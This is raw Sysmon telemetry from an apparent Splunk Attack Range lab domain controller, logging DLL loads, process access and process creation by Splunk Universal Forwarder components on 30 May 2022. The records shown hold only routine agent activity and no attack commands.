Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x8000000000000000100306Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x8000000000000000100305Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x8000000000000000100304Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 
734700x8000000000000000100303Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100302Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 10341000x8000000000000000100301Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100300Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-C12F-6294-450B-000000005502}5776C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x8000000000000000100299Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 23542300x8000000000000000100298Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4586EFE84E504E44345AB6EAD6C742E2,SHA256=7B6ADB1C78A48055ED986F30F0D5D7CE638FD17F48F91A8E60FD7B496A02288E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x8000000000000000100297Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x8000000000000000100296Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exeMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9trueSplunk, Inc.Valid 10341000x8000000000000000100295Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100294Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:05:51.982{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100293Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-A252-6294-0500-000000005502}416432C:\Windows\system32\csrss.exe{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000100292Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:05:51.982{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100291Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100290Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.982{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000100289Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.983{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
734700x8000000000000000100288Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.404{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x8000000000000000100287Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.404{326FD73D-C12F-6294-440B-000000005502}45601160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x8000000000000000100286Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.404{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating 
SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x8000000000000000100285Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.404{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x8000000000000000100284Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.232{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100283Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.232{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 
734700x8000000000000000100282Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.232{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100281Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.232{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100280Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.232{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x8000000000000000100279Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.232{326FD73D-C12F-6294-440B-000000005502}4560C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100278Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.232{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100277Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.232{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x8000000000000000100276Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.217{326FD73D-C12F-6294-440B-000000005502}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft 
Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x8000000000000000100315Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x8000000000000000100314Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100313Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x8000000000000000100312Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x8000000000000000100311Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x8000000000000000100310Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x8000000000000000100309Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:51.997{326FD73D-C12F-6294-450B-000000005502}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup 
APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 23542300x8000000000000000100342Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:53.482{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12AEBE66A53E0E618997B999279B96B6,SHA256=7A7A673E3D3F0DE64BDEE5D9CFF81104467D1E3C2CDB55152F1B48A364EE24CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100341Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 